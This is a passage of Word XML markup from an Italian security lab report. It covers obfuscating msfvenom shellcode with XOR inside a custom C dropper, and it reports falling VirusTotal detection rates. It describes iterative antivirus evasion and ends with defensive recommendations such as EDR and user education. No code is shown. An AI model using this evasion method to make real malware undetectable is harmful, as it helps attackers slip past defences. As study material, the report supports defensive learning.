        <w:t xml:space="preserve">Esegue lo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> in memoria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7396A1" w14:textId="6899E76D" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Principio:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> Questo approccio è molto più </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>stealthy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> perché il payload malevolo (lo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> originale) non esiste mai in forma chiara sul disco. Viene decifrato solo in memoria, al momento dell'esecuzione. L'antivirus deve quindi essere in grado di rilevare il comportamento (es. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> seguito da esecuzione di codice in memoria) o le firme del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>dropper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> stesso, piuttosto che le firme dello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C66904D" w14:textId="00AF10B2" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Analisi su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dropper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Finale </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">Il file dropper4.exe (generato dal codice C e contenente lo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> offuscato) è stato caricato su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BAD6CF" w14:textId="7FE9D847" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rilevamenti:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> Il file è stato flaggato da </w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>24/72</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> motori antivirus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCF67FD" w14:textId="13907317" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Etichette Comuni:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>trojan.rozena</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">, Win64.Evo-gen, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Suspicious</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> PE, ML </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Attribute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>HighConfidence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED535DF" w14:textId="572039A8" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="11DBA8FA" wp14:editId="5E4DC485">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>123825</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>15240</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3759835" cy="2828925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21527"/>
                <wp:lineTo x="21450" y="21527"/>
                <wp:lineTo x="21450" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="46160778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759835" cy="28289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5679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Confronto:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> C'è stata una </w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>significativa riduzione</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> nel tasso di rilevamento rispetto al payload base (60/72) e potenzialmente anche rispetto al payload solo con encoder </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2480614A" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusioni sul </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dropper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Personalizzato:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> L'uso di un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>dropper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> personalizzato con XOR manuale ha dimostrato un'efficacia molto maggiore nel ridurre la rilevabilità. Questo perché:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C210CFA" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:t>La firma statica del payload originale è completamente alterata sul disco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFBBC65" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">L'antivirus deve basarsi su euristiche, analisi comportamentale (rilevando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> e l'esecuzione di codice in memoria) o firme specifiche del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>dropper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> stesso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C49F7A" w14:textId="137E6148" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:t>La combinazione di tecniche (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> per lo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>, Python per l'offuscamento, C per l'esecuzione) rende l'attacco più sofisticato e difficile da rilevare per i sistemi di sicurezza basati su firme.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A26D75F" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. Analisi e Miglioramenti Continui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F213F5D" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:t>Le immagini indicano chiaramente che la fase di test e analisi è iterativa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4988A32F" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Testare Nuovamente:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> L'incoraggiamento a ritestare su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> dopo ogni modifica è cruciale per comprendere l'impatto delle tecniche.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E91818" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analizzare i Risultati:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> Se il payload è ancora rilevato, si suggerisce di continuare a sperimentare con diversi encoder e iterazioni. Ciò sottolinea che la "non rilevabilità" è una "corsa agli armamenti" continua tra attaccanti e difensori.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3506212D" w14:textId="431ABA65" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Monitoraggio:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> La necessità di adattare la strategia in base ai risultati evidenzia che le firme antivirus vengono costantemente aggiornate e che le tecniche di offuscamento devono evolversi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47339CD4" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Conclusioni e Implicazioni per la Difesa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221456EC" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">Questo esercizio ha illustrato efficacemente come diverse tecniche di offuscamento, dal semplice uso di encoder di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> alla creazione di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>dropper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> personalizzati con cifratura XOR, possano influenzare la rilevabilità di un payload malevolo. Abbiamo osservato una chiara diminuzione nel tasso di rilevamento man mano che le tecniche di offuscamento diventavano più sofisticate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0157506A" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:t>Per la parte di difesa, i risultati di questo esercizio sottolineano l'importanza di:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB49A39" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Non Affidarsi Solo alle Firme Statiche:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> Gli antivirus basati esclusivamente su firme statiche sono facilmente eludibili da payload offuscati.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648D3A86" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implementare Analisi Comportamentale (EDR):</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> I sistemi EDR (Endpoint </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Detection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Response</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">) e </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>le sandbox</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> sono fondamentali per rilevare i malware che eseguono comportamenti sospetti in memoria (es. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>, iniezione di codice) anche se il loro codice non ha una firma conosciuta sul disco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190B0667" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Threat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Intelligence Aggiornata:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> Mantenere aggiornate le definizioni antivirus e le regole IDS/IPS è vitale, ma non sufficiente da solo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570165CC" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Educazione degli Utenti:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> Molti di questi payload richiedono ancora un'esecuzione da parte dell'utente (es. tramite phishing). L'educazione degli utenti sulle minacce e sul riconoscimento dei tentativi di social engineering rimane una prima linea di difesa critica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBCE504" w14:textId="77777777" w:rsidR="003B790C" w:rsidRDefault="003B790C"/>
    <w:sectPr w:rsidR="003B790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D909D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A24A6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F345C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="891A24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B334B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="95AE9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EC3F34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F50A2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E2153F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7786C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D76DA1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="109C9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1F092C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="415AA3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C9834F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C9C4E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8F1B88"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE420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FD6A1D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="66A2B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306C3B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D5329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F44C83"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE8E3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5EB43FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B062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90E1E14"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F123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BBD5CAE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AFAE1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DE20D78"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA465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8178619">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="638068887">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1933584834">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="627394730">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="959067096">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="121584394">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2085911281">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2065178395">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1617444419">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="339890688">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="385035398">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="889265489">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="364327193">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="761804448">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="180946345">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="173253540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9CB"/>
    <w:rsid w:val="0035679F"/>
    <w:rsid w:val="003B790C"/>
    <w:rsid w:val="00695381"/>
    <w:rsid w:val="009A69CB"/>
    <w:rsid w:val="00B1031F"/>
    <w:rsid w:val="00CA5A3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6E961"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3E2B7CCB-B845-4937-A32B-B10FB087F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9A69C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9A69C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9A69CB"/>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9A69CB"/>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9A69CB"/>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9A69CB"/>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9A69CB"/>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9A69CB"/>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9A69CB"/>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9A69CB"/>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9A69CB"/>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9A69CB"/>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9A69CB"/>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9A69CB"/>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9A69CB"/>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9A69CB"/>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9A69CB"/>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9A69CB"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="TitoloCarattere"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="009A69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9A69CB"/>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9A69CB"/>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9A69CB"/>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9A69CB"/>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9A69CB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragrafoelenco">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="009A69CB"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasiintensa">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="009A69CB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citazioneintensa">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="CitazioneintensaCarattere"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="009A69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9A69CB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Riferimentointenso">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="009A69C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3975759">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1921522560">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
